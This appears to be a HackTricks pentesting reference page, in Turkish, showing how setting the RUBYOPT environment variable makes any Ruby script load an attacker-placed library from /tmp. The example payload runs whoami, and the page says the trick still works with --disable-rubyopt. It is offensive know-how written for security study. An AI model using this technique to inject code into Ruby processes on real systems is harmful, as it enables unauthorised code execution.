macOS Ruby Applications Injection

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'ı takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

RUBYOPT

Bu ortam değişkenini kullanarak, ruby her çalıştırıldığında yeni parametreler eklemek mümkündür. -e parametresi ruby kodu belirtmek için kullanılamasa da, -I ve -r parametrelerini kullanarak yükleme yolu için yeni bir klasör eklemek ve ardından yüklemek için bir kütüphane belirtmek mümkündür.

/tmp dizininde inject.rb kütüphanesini oluşturun:

inject.rb

puts `whoami`

Herhangi bir yere aşağıdaki gibi bir ruby script oluşturun:

hello.rb

puts 'Hello, World!'

Arbitrary bir ruby betiğinin bunu yüklemesini sağlayın:

RUBYOPT="-I/tmp -rinject" ruby hello.rb

Eğlenceli bir gerçek, --disable-rubyopt parametresi ile bile çalışıyor:

RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

PreviousmacOS Python Applications Injection NextmacOS .Net Applications Injection

Last updated 1 month ago